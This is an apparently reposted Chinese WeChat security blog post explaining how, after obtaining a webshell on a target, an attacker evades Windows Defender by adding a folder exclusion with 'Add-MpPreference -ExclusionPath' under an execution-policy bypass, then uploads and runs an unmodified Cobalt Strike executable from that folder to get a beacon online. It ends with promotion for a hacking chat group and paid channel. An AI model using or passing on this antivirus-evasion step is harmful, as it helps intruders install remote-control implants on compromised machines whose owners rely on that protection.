免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
只供对已授权的目标使用测试,对未授权目标的测试作者不承担责任,均由使用本人自行承担。
文章正文
偶然看到了通过powershell操作defender来添加排除项
https://docs.microsoft.com/en-us/powershell/module/defender/?view=windowsserver2019-ps
所以就有了这个场景:
假设我们拿到目标机器的webshell,对方开着Windows defender,在不会写免杀的情况下,上线CS:
添加排除项:
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:justtest"
CS生成一个普通的exe马:
上传到justtest目录:
运行:
上线:
技术交流
交流群
关注公众号回复“加群”,添加Z2OBot 小K自动拉你加入Z2O安全攻防交流群分享更多好东西。
知识星球
团队建立了知识星球,不定时更新最新漏洞复现,手把手教你,同时不定时更新POC、内外网渗透测试骚操作。感兴趣的可以加一下。
往期文章:
Powershell 免杀过 defender 火绒,附自动化工具Z2OBot
点一下爱心再走吧!
原文始发于微信公众号(Z2O安全攻防):不会写免杀也能轻松过defender上线CS
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论